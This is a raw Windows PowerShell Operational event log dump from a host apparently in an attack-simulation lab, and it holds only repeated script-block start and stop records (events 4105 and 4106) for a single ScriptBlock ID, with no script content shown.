Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468752
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468751
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468750
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468749
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468748
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468747
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468746
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468745
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468744
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468743
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468742
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468741
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468740
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468739
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468738
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468737
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468736
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468735
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468734
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468733
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468732
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468731
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468730
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468729
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468728
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468727
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468726
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468725
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468724
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468723
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468722
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468721
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468720
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468719
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468718
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468717
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468716
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468715
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468714
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468713
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468712
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468711
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468710
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468709
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468708
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468707
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468706
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468705
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468704
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468703
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468702
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468701
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468700
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468699
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468698
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
